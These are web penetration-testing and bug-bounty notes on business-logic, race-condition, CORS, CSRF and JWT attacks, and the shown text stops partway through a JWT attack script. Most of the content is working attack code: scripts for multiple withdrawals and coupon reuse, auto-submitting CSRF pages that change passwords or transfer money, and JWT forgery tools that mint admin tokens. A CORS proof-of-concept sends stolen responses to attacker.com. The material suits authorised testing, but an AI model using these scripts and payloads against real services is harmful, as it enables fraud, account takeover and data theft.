Web VAPT & Bug Bounty Notes#
Business Logic Exploits#
Exploit flaws in application logic and workflow design to manipulate business processes, bypass intended restrictions, or abuse functionality for unintended outcomes.
E-commerce platforms, fintech applications, subscription services, and crypto/Web3 applications present rich business logic vulnerabilities. Focus on race conditions, workflow bypasses, and economic attacks.
Parameter Manipulation#
# Price manipulation
# Original request:
POST /api/checkout HTTP/1.1
Content-Type: application/json
{"item_id":"123","quantity":1,"price":100.00}
# Attacks:
{"item_id":"123","quantity":1,"price":-100.00} # Negative price
{"item_id":"123","quantity":1,"price":0.01} # Near-zero price
{"item_id":"123","quantity":1,"price":"100"} # String vs number confusion
# Quantity manipulation
{"item_id":"123","quantity":-1,"price":100.00} # Negative quantity (refund?)
{"item_id":"123","quantity":999999,"price":100.00} # Integer overflow
{"item_id":"123","quantity":0,"price":100.00} # Zero quantity (free item?)
{"item_id":"123","quantity":0.5,"price":100.00} # Float quantity
# Discount abuse
# Apply multiple discount codes
POST /api/apply-discount HTTP/1.1
Content-Type: application/json
{"order_id":"456","discount_code":"SAVE10"}
{"order_id":"456","discount_code":"SAVE20"}
{"order_id":"456","discount_code":"SAVE30"}
# Check if all discounts stack
# Use expired/invalid codes
{"order_id":"456","discount_code":"EXPIRED2019"}
{"order_id":"456","discount_code":"INVALID"}
# Discount code enumeration
for code in $(cat discount_codes.txt); do
curl -s -X POST "http://target.com/api/apply-discount" \
-H "Content-Type: application/json" \
-d "{\"order_id\":\"456\",\"discount_code\":\"$code\"}"
done
# Boolean manipulation (privilege fields)
POST /api/user/register HTTP/1.1
Content-Type: application/json
{"username":"test","email":"test@test.com","is_premium":false}
# Try: {"username":"test","email":"test@test.com","is_premium":true}
{"is_admin":false} → {"is_admin":true}
{"user_type":"normal"} → {"user_type":"premium"}
{"role":"user"} → {"role":"admin"}
{"verified":false} → {"verified":true}
# Currency manipulation
{"amount":100,"currency":"USD"}
# Try: {"amount":100,"currency":"JPY"} # 100 JPY = ~$0.67
# Try: {"amount":100,"currency":""} # No currency
# Try: {"amount":100,"currency":"ABC"} # Invalid currency
# Subscription tier manipulation
POST /api/subscribe HTTP/1.1
Content-Type: application/json
{"plan":"basic","price":9.99}
# Try: {"plan":"enterprise","price":9.99}
# Credit/points manipulation
{"credits_to_use":10} → {"credits_to_use":-10} # Gain credits?
{"points":100} → {"points":999999} # Overflow
{"wallet_balance":50.00} → {"wallet_balance":5000.00}
# OPSEC: Automated parameter fuzzing
cat > parameter_fuzzer.py << 'EOF'
#!/usr/bin/env python3
import requests
import json
import sys
def fuzz_parameters(url, base_payload, token):
print("[*] Fuzzing business logic parameters")
# Price manipulation tests
price_tests = [
-100, -1, -0.01, 0, 0.01, 1, 999999, -999999,
"0", "-1", "abc", "null", "", None
]
for price in price_tests:
payload = base_payload.copy()
payload['price'] = price
headers = {
'Authorization': f'Bearer {token}',
'Content-Type': 'application/json'
}
try:
r = requests.post(url, json=payload, headers=headers, timeout=5)
if r.status_code in [200, 201]:
print(f"[+] SUCCESS with price={price}")
print(f" Response: {r.text[:200]}")
# Check if order was created with manipulated price
if 'order_id' in r.text or 'success' in r.text.lower():
print(f"[!] CRITICAL: Order created with price={price}")
except Exception as e:
print(f"[-] Error with price={price}: {e}")
# Quantity manipulation
quantity_tests = [-1, -10, 0, 999999, -999999, 0.5]
for qty in quantity_tests:
payload = base_payload.copy()
payload['quantity'] = qty
try:
r = requests.post(url, json=payload, headers=headers, timeout=5)
if r.status_code in [200, 201]:
print(f"[+] SUCCESS with quantity={qty}")
except:
pass
# Boolean privilege escalation
privilege_fields = [
'is_admin', 'is_premium', 'is_verified',
'admin', 'premium', 'verified',
'role', 'user_type', 'access_level'
]
for field in privilege_fields:
payload = base_payload.copy()
payload[field] = True
try:
r = requests.post(url, json=payload, headers=headers, timeout=5)
if r.status_code in [200, 201]:
print(f"[+] SUCCESS with {field}=True")
if field in r.text.lower():
print(f"[!] CRITICAL: Privilege escalation via {field}")
except:
pass
if __name__ == "__main__":
if len(sys.argv) < 4:
print(f"Usage: {sys.argv[0]} <url> <payload_json> <token>")
print(f"Example: {sys.argv[0]} http://api.com/order '{{\"item\":\"123\"}}' token")
sys.exit(1)
url = sys.argv[1]
payload = json.loads(sys.argv[2])
token = sys.argv[3]
fuzz_parameters(url, payload, token)
EOF
chmod +x parameter_fuzzer.py
Race Conditions#
# Race condition exploitation (parallel requests)
# Scenario 1: Concurrent purchase of limited items
# If only 1 item in stock, send 10 simultaneous purchase requests
cat > race_condition_purchase.sh << 'EOF'
#!/bin/bash
# Usage: ./race_condition_purchase.sh http://target.com/api/purchase token item_id
url="$1"
token="$2"
item_id="$3"
threads=20
echo "[*] Starting race condition attack with $threads threads"
# Function to make purchase request
purchase() {
curl -s -X POST "$url" \
-H "Authorization: Bearer $token" \
-H "Content-Type: application/json" \
-d "{\"item_id\":\"$item_id\",\"quantity\":1}" &
}
# Fire all requests simultaneously
for i in $(seq 1 $threads); do
purchase
done
wait
echo "[*] All requests completed. Check your orders."
EOF
chmod +x race_condition_purchase.sh
# Scenario 2: Account balance race condition
# Withdraw $100 from account with only $100 balance multiple times
cat > race_condition_balance.py << 'EOF'
#!/usr/bin/env python3
import requests
import threading
import sys
def withdraw(url, token, amount, results):
headers = {
'Authorization': f'Bearer {token}',
'Content-Type': 'application/json'
}
payload = {'amount': amount}
try:
r = requests.post(url, json=payload, headers=headers, timeout=5)
results.append(r.status_code)
if r.status_code in [200, 201]:
print(f"[+] Withdrawal successful: {r.text[:100]}")
except Exception as e:
print(f"[-] Error: {e}")
if __name__ == "__main__":
if len(sys.argv) < 4:
print(f"Usage: {sys.argv[0]} <url> <token> <amount>")
sys.exit(1)
url = sys.argv[1]
token = sys.argv[2]
amount = float(sys.argv[3])
threads = []
results = []
print(f"[*] Starting race condition attack: withdrawing ${amount} x 10")
# Create 10 simultaneous withdrawal requests
for i in range(10):
t = threading.Thread(target=withdraw, args=(url, token, amount, results))
threads.append(t)
# Start all threads at once
for t in threads:
t.start()
# Wait for completion
for t in threads:
t.join()
successes = sum(1 for r in results if r in [200, 201])
print(f"\n[*] Results: {successes} successful withdrawals")
if successes > 1:
print(f"[!] RACE CONDITION VULNERABILITY: Multiple withdrawals succeeded!")
EOF
chmod +x race_condition_balance.py
python3 race_condition_balance.py http://api.com/withdraw token 100
# Scenario 3: Coupon/gift card race condition
# Use same gift card code multiple times simultaneously
cat > race_condition_coupon.py << 'EOF'
#!/usr/bin/env python3
import requests
import threading
import sys
import time
class CouponRace:
def __init__(self, url, coupon_code, num_threads=20):
self.url = url
self.coupon_code = coupon_code
self.num_threads = num_threads
self.success_count = 0
self.lock = threading.Lock()
def redeem(self, session_token):
headers = {
'Authorization': f'Bearer {session_token}',
'Content-Type': 'application/json'
}
payload = {'coupon_code': self.coupon_code}
try:
r = requests.post(self.url, json=payload, headers=headers, timeout=5)
if r.status_code in [200, 201]:
with self.lock:
self.success_count += 1
print(f"[+] Redemption #{self.success_count} successful")
except Exception as e:
pass
def attack(self, tokens):
threads = []
print(f"[*] Starting race condition with {self.num_threads} threads")
for i, token in enumerate(tokens[:self.num_threads]):
t = threading.Thread(target=self.redeem, args=(token,))
threads.append(t)
# Start all threads simultaneously
for t in threads:
t.start()
for t in threads:
t.join()
print(f"\n[*] Attack complete. {self.success_count} successful redemptions")
if self.success_count > 1:
print("[!] VULNERABILITY: Coupon redeemed multiple times!")
if __name__ == "__main__":
if len(sys.argv) < 3:
print(f"Usage: {sys.argv[0]} <url> <coupon_code> <tokens_file>")
sys.exit(1)
url = sys.argv[1]
coupon = sys.argv[2]
# Load multiple session tokens (create multiple accounts)
tokens = []
if len(sys.argv) > 3:
with open(sys.argv[3]) as f:
tokens = [line.strip() for line in f]
else:
# Use same token multiple times
tokens = ['YOUR_TOKEN'] * 20
race = CouponRace(url, coupon, num_threads=len(tokens))
race.attack(tokens)
EOF
chmod +x race_condition_coupon.py
# Scenario 4: Voting/rating race condition
# Vote multiple times on same item
for i in {1..100}; do
curl -s -X POST "http://target.com/api/vote" \
-H "Authorization: Bearer $token" \
-d '{"item_id":"123","vote":"upvote"}' &
done
wait
# OPSEC: Advanced race condition with precise timing
cat > precise_race_condition.py << 'EOF'
#!/usr/bin/env python3
import requests
import threading
import time
class PreciseRaceCondition:
def __init__(self, url, token, threads=10):
self.url = url
self.token = token
self.threads = threads
self.barrier = threading.Barrier(threads)
self.results = []
def make_request(self, payload):
# Wait at barrier for all threads to be ready
self.barrier.wait()
headers = {
'Authorization': f'Bearer {self.token}',
'Content-Type': 'application/json'
}
try:
start = time.time()
r = requests.post(self.url, json=payload, headers=headers)
end = time.time()
result = {
'status': r.status_code,
'time': end - start,
'response': r.text[:200]
}
self.results.append(result)
except Exception as e:
self.results.append({'error': str(e)})
def execute(self, payload):
threads = []
print(f"[*] Preparing {self.threads} threads for simultaneous execution")
for i in range(self.threads):
t = threading.Thread(target=self.make_request, args=(payload,))
threads.append(t)
t.start()
for t in threads:
t.join()
# Analyze results
successes = sum(1 for r in self.results if r.get('status') in [200, 201])
print(f"\n[*] Results:")
print(f" Successful requests: {successes}/{self.threads}")
print(f" Average response time: {sum(r.get('time', 0) for r in self.results) / len(self.results):.3f}s")
if successes > 1:
print(f"[!] RACE CONDITION: {successes} concurrent operations succeeded")
return self.results
# Example usage
if __name__ == "__main__":
race = PreciseRaceCondition(
url="http://target.com/api/purchase",
token="YOUR_TOKEN",
threads=20
)
payload = {
"item_id": "limited_item_123",
"quantity": 1
}
race.execute(payload)
EOF
chmod +x precise_race_condition.py
Workflow Bypasses#
# E-commerce flow bypass
# Normal flow:
# 1. Add to Cart
# 2. Enter Shipping Info
# 3. Enter Payment Info
# 4. Review Order
# 5. Confirm Purchase
# Attack: Skip payment step
# After step 2 (shipping), directly go to step 5 (confirm)
POST /api/order/confirm HTTP/1.1
Content-Type: application/json
{
"order_id":"12345",
"shipping_address":"123 Main St",
"payment_status":"completed" # Manually set as completed
}
# Multi-step registration bypass
# Normal: Step 1 → Step 2 → Step 3 → Complete
# Attack: Direct to Complete with minimal data
POST /api/register/complete HTTP/1.1
Content-Type: application/json
{
"step":3,
"email":"test@test.com",
"verified":true # Skip email verification
}
# Password reset bypass
# Normal: Request Reset → Email Link → New Password
# Attack: Direct to reset with guessed/enumerated token
GET /reset-password?token=000000 HTTP/1.1
# Try sequential tokens: 000001, 000002, etc.
# Or predict token pattern:
# If token = md5(email + timestamp)
# Calculate: md5("victim@target.com" + "recent_timestamp")
# Account verification bypass
# Skip email verification by manipulating state
POST /api/account/update HTTP/1.1
Content-Type: application/json
{
"email":"test@test.com",
"email_verified":true # Manually verify
}
# Payment verification bypass
# Mark order as paid without actual payment
POST /api/order/123/status HTTP/1.1
Content-Type: application/json
{
"payment_status":"paid",
"payment_method":"credit_card"
}
# Subscription cancellation bypass
# If cancellation requires multiple steps, skip to final
POST /api/subscription/cancel/confirm HTTP/1.1
Content-Type: application/json
{
"subscription_id":"sub_123",
"confirmed":true,
"skip_survey":true
}
# OPSEC: Workflow enumeration
cat > workflow_enum.py << 'EOF'
#!/usr/bin/env python3
import requests
import json
def enumerate_workflow_steps(base_url, token, max_steps=10):
"""Enumerate all possible workflow steps"""
print("[*] Enumerating workflow steps")
headers = {
'Authorization': f'Bearer {token}',
'Content-Type': 'application/json'
}
endpoints = []
# Try different step patterns
patterns = [
f"/api/workflow/step/{{step}}",
f"/api/process/{{step}}",
f"/api/register/step{{step}}",
f"/api/checkout/step-{{step}}",
f"/api/order/{{step}}"
]
for pattern in patterns:
for step in range(1, max_steps + 1):
url = base_url + pattern.format(step=step)
try:
r = requests.get(url, headers=headers, timeout=5)
if r.status_code == 200:
print(f"[+] Found step: {url}")
endpoints.append({
'url': url,
'step': step,
'response': r.text[:200]
})
except:
pass
# Try to skip to final step
if endpoints:
final_step = max(e['step'] for e in endpoints)
final_url = base_url + patterns[0].format(step=final_step)
print(f"\n[*] Testing direct access to final step: {final_url}")
payload = {
'step': final_step,
'completed': True,
'skip_validation': True
}
try:
r = requests.post(final_url, json=payload, headers=headers)
if r.status_code in [200, 201]:
print(f"[!] BYPASS: Direct access to final step succeeded!")
print(f" Response: {r.text[:200]}")
except Exception as e:
print(f"[-] Error: {e}")
return endpoints
if __name__ == "__main__":
enumerate_workflow_steps(
"http://target.com",
"YOUR_TOKEN"
)
EOF
chmod +x workflow_enum.py
Logic Flaw Testing#
# Automated business logic testing script
cat > business_logic_tester.py << 'EOF'
#!/usr/bin/env python3
import requests
import json
import sys
import time
class BusinessLogicTester:
def __init__(self, base_url, token):
self.base_url = base_url
self.token = token
self.headers = {
'Authorization': f'Bearer {token}',
'Content-Type': 'application/json'
}
self.vulnerabilities = []
def test_negative_values(self, endpoint, field):
"""Test negative value handling"""
print(f"\n[*] Testing negative values on {endpoint}")
negative_values = [-1, -10, -100, -999999]
for value in negative_values:
payload = {field: value}
try:
r = requests.post(
f"{self.base_url}{endpoint}",
json=payload,
headers=self.headers,
timeout=5
)
if r.status_code in [200, 201]:
print(f"[!] VULNERABILITY: Negative value accepted: {value}")
self.vulnerabilities.append({
'type': 'negative_value',
'endpoint': endpoint,
'field': field,
'value': value
})
except Exception as e:
pass
def test_overflow(self, endpoint, field):
"""Test integer overflow"""
print(f"\n[*] Testing overflow on {endpoint}")
overflow_values = [
999999999,
2147483647, # Max 32-bit int
2147483648, # Max + 1
9999999999999
]
for value in overflow_values:
payload = {field: value}
try:
r = requests.post(
f"{self.base_url}{endpoint}",
json=payload,
headers=self.headers,
timeout=5
)
if r.status_code in [200, 201]:
print(f"[!] VULNERABILITY: Overflow value accepted: {value}")
self.vulnerabilities.append({
'type': 'overflow',
'endpoint': endpoint,
'field': field,
'value': value
})
except Exception as e:
pass
def test_boundary_values(self, endpoint, field, min_val=0, max_val=100):
"""Test boundary values"""
print(f"\n[*] Testing boundary values on {endpoint}")
boundary_values = [
min_val - 1,
min_val,
min_val + 1,
max_val - 1,
max_val,
max_val + 1
]
for value in boundary_values:
payload = {field: value}
try:
r = requests.post(
f"{self.base_url}{endpoint}",
json=payload,
headers=self.headers,
timeout=5
)
print(f" {field}={value}: Status {r.status_code}")
except Exception as e:
pass
def test_missing_parameters(self, endpoint, required_params):
"""Test with missing required parameters"""
print(f"\n[*] Testing missing parameters on {endpoint}")
for param in required_params:
# Create payload without this parameter
payload = {p: "test" for p in required_params if p != param}
try:
r = requests.post(
f"{self.base_url}{endpoint}",
json=payload,
headers=self.headers,
timeout=5
)
if r.status_code in [200, 201]:
print(f"[!] VULNERABILITY: Request succeeded without '{param}'")
self.vulnerabilities.append({
'type': 'missing_parameter',
'endpoint': endpoint,
'missing_param': param
})
except Exception as e:
pass
def test_type_confusion(self, endpoint, field):
"""Test type confusion (string vs int vs bool)"""
print(f"\n[*] Testing type confusion on {endpoint}")
test_values = [
100, # int
"100", # string
True, # boolean
[100], # array
{"value": 100}, # object
None, # null
"null", # string "null"
"", # empty string
]
for value in test_values:
payload = {field: value}
try:
r = requests.post(
f"{self.base_url}{endpoint}",
json=payload,
headers=self.headers,
timeout=5
)
print(f" {field}={value} (type: {type(value).__name__}): Status {r.status_code}")
except Exception as e:
pass
def generate_report(self):
"""Generate vulnerability report"""
print("\n" + "="*60)
print("BUSINESS LOGIC VULNERABILITY REPORT")
print("="*60)
if not self.vulnerabilities:
print("\n[+] No vulnerabilities detected")
else:
print(f"\n[!] Found {len(self.vulnerabilities)} vulnerabilities:\n")
for i, vuln in enumerate(self.vulnerabilities, 1):
print(f"{i}. {vuln['type'].upper()}")
print(f" Endpoint: {vuln['endpoint']}")
print(f" Details: {json.dumps({k:v for k,v in vuln.items() if k not in ['type', 'endpoint']}, indent=6)}")
print()
# Save to file
with open('business_logic_report.json', 'w') as f:
json.dump(self.vulnerabilities, f, indent=2)
print("[*] Report saved to: business_logic_report.json")
# Example usage
if __name__ == "__main__":
if len(sys.argv) < 3:
print(f"Usage: {sys.argv[0]} <base_url> <token>")
sys.exit(1)
tester = BusinessLogicTester(sys.argv[1], sys.argv[2])
# Test various endpoints
tester.test_negative_values('/api/purchase', 'price')
tester.test_negative_values('/api/purchase', 'quantity')
tester.test_overflow('/api/purchase', 'quantity')
tester.test_boundary_values('/api/purchase', 'quantity', 0, 100)
tester.test_missing_parameters('/api/purchase', ['item_id', 'quantity', 'price'])
tester.test_type_confusion('/api/purchase', 'price')
tester.generate_report()
EOF
chmod +x business_logic_tester.py
python3 business_logic_tester.py http://target.com YOUR_TOKEN
Advanced Attacks#
Cross-Origin Resource Sharing (CORS) Misconfiguration#
bash
# CORS Misconfiguration Testing
# Test 1: Reflected Origin (most critical)
GET /api/sensitive HTTP/1.1
Host: vulnerable.com
Origin: https://evil.com
# Look for response:
Access-Control-Allow-Origin: https://evil.com
Access-Control-Allow-Credentials: true
# If both present = CRITICAL vulnerability
# Test 2: Null Origin
GET /api/sensitive HTTP/1.1
Host: vulnerable.com
Origin: null
# Check if:
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
# Test 3: Wildcard with credentials (misconfiguration)
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
# This is invalid by spec but some servers allow it
# Test 4: Subdomain bypass
Origin: https://evil.vulnerable.com
Origin: https://vulnerableevil.com
Origin: https://vulnerable.com.evil.com
# Test 5: Regex bypass (if origin validation uses regex)
Origin: https://vulnerableXcom # If regex: /vulnerable\.com/
Origin: https://vulnerable.com.evil.com
# OPSEC: Automated CORS testing
cat > cors_scanner.py << 'EOF'
#!/usr/bin/env python3
import requests
import sys
def test_cors(url, sensitive_endpoint='/api/user/profile'):
"""Test CORS misconfigurations"""
print(f"[*] Testing CORS on {url}{sensitive_endpoint}")
test_origins = [
'https://evil.com',
'https://attacker.com',
'null',
'http://localhost',
f'https://evil.{url.split("//")[1]}',
f'https://{url.split("//")[1]}.evil.com'
]
vulnerabilities = []
for origin in test_origins:
headers = {'Origin': origin}
try:
r = requests.get(url + sensitive_endpoint, headers=headers, timeout=5)
acao = r.headers.get('Access-Control-Allow-Origin', '')
acac = r.headers.get('Access-Control-Allow-Credentials', '')
print(f"\n[*] Testing Origin: {origin}")
print(f" Access-Control-Allow-Origin: {acao}")
print(f" Access-Control-Allow-Credentials: {acac}")
# Check for vulnerabilities
if acao == origin and acac.lower() == 'true':
print(f"[!] CRITICAL: Reflected origin with credentials!")
vulnerabilities.append({
'origin': origin,
'type': 'reflected_origin_with_creds'
})
elif acao == '*' and acac.lower() == 'true':
print(f"[!] CRITICAL: Wildcard with credentials!")
vulnerabilities.append({
'origin': origin,
'type': 'wildcard_with_creds'
})
elif acao == 'null' and acac.lower() == 'true':
print(f"[!] HIGH: Null origin with credentials!")
vulnerabilities.append({
'origin': origin,
'type': 'null_origin_with_creds'
})
except Exception as e:
print(f"[-] Error testing {origin}: {e}")
if vulnerabilities:
print(f"\n[!] Found {len(vulnerabilities)} CORS vulnerabilities")
generate_poc(url, sensitive_endpoint, vulnerabilities[0])
else:
print("\n[+] No CORS vulnerabilities detected")
return vulnerabilities
def generate_poc(target_url, endpoint, vuln):
"""Generate CORS exploitation PoC"""
poc_html = f"""<!DOCTYPE html>
<html>
<head>
<title>CORS PoC - {target_url}</title>
</head>
<body>
<h1>CORS Exploitation PoC</h1>
<div id="output"></div>
<script>
// CORS exploit to steal sensitive data
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {{
if (xhr.readyState == 4 && xhr.status == 200) {{
// Display stolen data
document.getElementById('output').innerHTML =
'<h2>Stolen Data:</h2><pre>' + xhr.responseText + '</pre>';
// Exfiltrate to attacker server
fetch('https://attacker.com/steal', {{
method: 'POST',
body: xhr.responseText
}});
}}
}};
xhr.open('GET', '{target_url}{endpoint}', true);
xhr.withCredentials = true; // Include cookies
xhr.send();
</script>
</body>
</html>"""
with open('cors_poc.html', 'w') as f:
f.write(poc_html)
print(f"\n[+] PoC saved to: cors_poc.html")
print(f"[+] Host this file and have victim visit it")
if __name__ == "__main__":
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <target_url>")
sys.exit(1)
test_cors(sys.argv[1])
EOF
chmod +x cors_scanner.py
python3 cors_scanner.py https://target.com
Cross-Site Request Forgery (CSRF)#
# CSRF Detection and Exploitation
# Step 1: Identify state-changing requests
POST /change-password HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Cookie: session=abc123
current_password=old123&new_password=new456
# Step 2: Check for CSRF protections
# - CSRF tokens in forms/headers
# - SameSite cookie attributes
# - Referer/Origin header validation
# - Custom headers requirement
# Step 3: Test for bypasses
# Bypass 1: Remove CSRF token
POST /change-password HTTP/1.1
# ... (without CSRF token)
# Bypass 2: Use invalid CSRF token
csrf_token=invalid
# Bypass 3: Use another user's CSRF token
csrf_token=ANOTHER_USER_TOKEN
# Bypass 4: Change request method (if poorly implemented)
GET /change-password?new_password=hacked
# Bypass 5: Change Content-Type
Content-Type: application/json
Content-Type: text/plain
Content-Type: multipart/form-data
# CSRF PoC generation (Burp Suite method)
# Right-click request → Engagement Tools → Generate CSRF PoC
# Manual CSRF PoC (form-based)
cat > csrf_poc.html << 'EOF'
<!DOCTYPE html>
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<h1>Loading...</h1>
<form action="https://target.com/change-password" method="POST" id="csrf-form">
<input type="hidden" name="new_password" value="hacked123">
</form>
<script>
// Auto-submit form when page loads
document.getElementById('csrf-form').submit();
</script>
</body>
</html>
EOF
# CSRF with JSON payload
cat > csrf_json_poc.html << 'EOF'
<!DOCTYPE html>
<html>
<head>
<title>CSRF JSON PoC</title>
</head>
<body>
<h1>Loading...</h1>
<script>
// CSRF with JSON via XMLHttpRequest
var xhr = new XMLHttpRequest();
xhr.open('POST', 'https://target.com/api/change-email', true);
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.withCredentials = true; // Include cookies
xhr.send('{"email":"attacker@evil.com"}');
</script>
</body>
</html>
EOF
# CSRF with Fetch API (modern)
cat > csrf_fetch_poc.html << 'EOF'
<!DOCTYPE html>
<html>
<body>
<script>
fetch('https://target.com/api/transfer', {
method: 'POST',
credentials: 'include', // Include cookies
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify({
to: 'attacker',
amount: 1000
})
});
</script>
</body>
</html>
EOF
# Bypassing SameSite=Lax (2025 techniques)
# SameSite=Lax allows GET requests from cross-site
# If application accepts GET for state-changing:
cat > csrf_samesite_bypass.html << 'EOF'
<!DOCTYPE html>
<html>
<body>
<!-- SameSite=Lax bypass via top-level navigation -->
<script>
// Method 1: Direct navigation (allows cookies)
window.location = 'https://target.com/delete-account?confirm=true';
// Method 2: Use form with GET method
// <form action="https://target.com/delete-account" method="GET">
// <input name="confirm" value="true">
// </form>
</script>
</body>
</html>
EOF
# Bypassing Referer validation
# If server checks Referer header
# Method 1: Suppress Referer
<meta name="referrer" content="no-referrer">
# Method 2: Match domain in Referer
# Host PoC at: target.com.evil.com
# Or: evil.com/target.com/csrf.html
# OPSEC: Automated CSRF testing
cat > csrf_tester.py << 'EOF'
#!/usr/bin/env python3
import requests
from bs4 import BeautifulSoup
import sys
def find_csrf_vulnerabilities(base_url, authenticated_session):
"""Test endpoints for CSRF vulnerabilities"""
print(f"[*] Testing {base_url} for CSRF vulnerabilities")
session = requests.Session()
session.cookies.update(authenticated_session)
# Get forms from main pages
pages = ['/', '/profile', '/settings', '/account']
vulnerabilities = []
for page in pages:
try:
r = session.get(base_url + page)
soup = BeautifulSoup(r.text, 'html.parser')
forms = soup.find_all('form')
for form in forms:
action = form.get('action', '')
method = form.get('method', 'GET').upper()
# Check if form has CSRF token
csrf_input = form.find('input', {'name': lambda x: x and 'csrf' in x.lower()})
if method == 'POST' and not csrf_input:
print(f"[!] Potential CSRF: {method} {action}")
print(f" No CSRF token found")
vulnerabilities.append({
'url': base_url + action,
'method': method,
'has_csrf_token': False
})
# Test if request works without CSRF token
form_data = {}
for input_field in form.find_all('input'):
name = input_field.get('name')
if name and 'csrf' not in name.lower():
form_data[name] = 'test'
test_response = session.request(
method,
base_url + action,
data=form_data
)
if test_response.status_code in [200, 201, 302]:
print(f"[!] CONFIRMED: Request succeeded without CSRF token")
except Exception as e:
print(f"[-] Error testing {page}: {e}")
return vulnerabilities
if __name__ == "__main__":
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <base_url> [session_cookie]")
sys.exit(1)
base_url = sys.argv[1]
session_cookie = {}
if len(sys.argv) > 2:
session_cookie = {'session': sys.argv[2]}
find_csrf_vulnerabilities(base_url, session_cookie)
EOF
chmod +x csrf_tester.py
JSON Web Token (JWT) Attacks#
# JWT Structure: header.payload.signature
# Example: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
# Attack 1: Algorithm Confusion (alg=none)
# Decode JWT at jwt.io
# Change algorithm to "none" in header
# Remove signature (keep trailing dot)
# Header: {"alg":"none","typ":"JWT"}
# Payload: {"sub":"admin","iat":1516239022}
# Result: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImlhdCI6MTUxNjIzOTAyMn0.
# Attack 2: Algorithm Confusion (RS256 to HS256)
# If server uses RS256 (asymmetric) but accepts HS256 (symmetric)
# Sign token with HS256 using server's RSA public key
cat > jwt_rs256_to_hs256.py << 'EOF'
#!/usr/bin/env python3
import jwt
import sys
def rs256_to_hs256_attack(token, public_key_file):
"""Convert RS256 JWT to HS256 using public key as secret"""
# Decode without verification
payload = jwt.decode(token, options={"verify_signature": False})
# Modify payload (e.g., escalate privileges)
payload['role'] = 'admin'
payload['is_admin'] = True
# Read public key
with open(public_key_file, 'r') as f:
public_key = f.read()
# Sign with HS256 using public key as secret
malicious_token = jwt.encode(payload, public_key, algorithm='HS256')
print(f"[+] Original token: {token}")
print(f"[+] Malicious token: {malicious_token}")
return malicious_token
if __name__ == "__main__":
if len(sys.argv) < 3:
print(f"Usage: {sys.argv[0]} <jwt_token> <public_key_file>")
sys.exit(1)
rs256_to_hs256_attack(sys.argv[1], sys.argv[2])
EOF
chmod +x jwt_rs256_to_hs256.py
# Attack 3: Weak Secret Brute Force
# Using hashcat
hashcat -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt
# Using john the ripper
john jwt.txt --wordlist=rockyou.txt --format=HMAC-SHA256
# Using jwt-cracker (Node.js)
npm install -g jwt-cracker
jwt-cracker "eyJ0eXAiOiJKV1QiLCJhbGc..." "abcdefghijklmnopqrstuvwxyz0123456789" 6
# Attack 4: Kid Parameter Manipulation
# If JWT header has "kid" (Key ID), try path traversal
# Original header:
# {"alg":"HS256","typ":"JWT","kid":"key1"}
# Attack headers:
{"alg":"HS256","typ":"JWT","kid":"../../dev/null"} # Empty file = empty secret
{"alg":"HS256","typ":"JWT","kid":"/dev/null"}
{"alg":"HS256","typ":"JWT","kid":"../../../proc/self/environ"}
# Sign with empty secret:
import jwt
payload = {"sub":"admin"}
token = jwt.encode(payload, "", algorithm="HS256")
# Attack 5: JKU (JWK Set URL) Header Injection
# Host malicious JWK on your server
# JWT header:
{
"alg": "RS256",
"typ": "JWT",
"jku": "https://attacker.com/jwks.json"
}
# Host jwks.json on attacker.com:
cat > jwks.json << 'EOF'
{
"keys": [
{
"kty": "RSA",
"kid": "attacker-key",
"use": "sig",
"n": "YOUR_PUBLIC_KEY_N",
"e": "AQAB"
}
]
}
EOF
# Generate your own RSA key pair
openssl genrsa -out private.pem 2048
openssl rsa -in private.pem -pubout -out public.pem
# Attack 6: X5U (X.509 URL) Header Injection
# Similar to JKU but with X.509 certificate
{
"alg": "RS256",
"typ": "JWT",
"x5u": "https://attacker.com/cert.pem"
}
# Attack 7: JWT Confusion via Multiple Algorithms
# Some libraries accept both algorithms
# Try signing with different algorithms
# OPSEC: Comprehensive JWT testing tool
cat > jwt_attacker.py << 'EOF'
#!/usr/bin/env python3
import jwt
import json
import base64
import sys
class JWTAttacker:
def __init__(self, token):
self.token = token
self.header = jwt.get_unverified_header(token)
self.payload = jwt.decode(token, options={"verify_signature": False})
def display_info(self):
"""Display JWT information"""
print("[*] JWT Information:")
print(f" Header: {json.dumps(self.header, indent=6)}")
print(f" Payload: {json.dumps(self.payload, indent=6)}")
def none_algorithm_attack(self):
"""Generate token with alg=none"""
print("\n[*] Attack 1: None Algorithm")
header = self.header.copy()
header['alg'] = 'none'
# Escalate privileges in payload
payload = self.payload.copy()
payload['role'] = 'admin'
payload['is_admin'] = True
# Encode without signature
header_b64 = base64.urlsafe_b64encode(
json.dumps(header).encode()
).decode().rstrip('=')
payload_b64 = base64.urlsafe_b64encode(
json.dumps(payload).encode()
).decode().rstrip('=')
malicious_token = f"{header_b64}.{payload_b64}."
print(f"[+] Malicious token: {malicious_token}")
return malicious_token
def weak_secret_test(self, wordlist=['secret', 'password', 'key', '123456']):
"""Test common weak secrets"""
print("\n[*] Attack 2: Weak Secret Testing")
for secret in wordlist:
try:
jwt.decode(self.token, secret, algorithms=['HS256', 'HS512'])
print(f"[!] WEAK SECRET FOUND: {secret}")
# Generate admin token
payload = self.payload.copy()
payload['role'] = 'admin'
payload['is_admin'] = True
admin_token = jwt.encode(payload, secret, algorithm='HS256')
print(f"[+] Admin token: {admin_token}")
return secret
except jwt.InvalidSignatureError:
pass
except Exception as e:
pass
print("[-] No weak secrets found in wordlist")
return None
def kid_manipulation(self):
"""Test kid parameter manipulation"""
print("\n[*] Attack 3: Kid Parameter Manipulation")
kid_payloads = [
"/dev/null",
"../../dev/null",
"../../../proc/self/environ",
"../../../../etc/passwd"
]
payload = self.payload.copy()
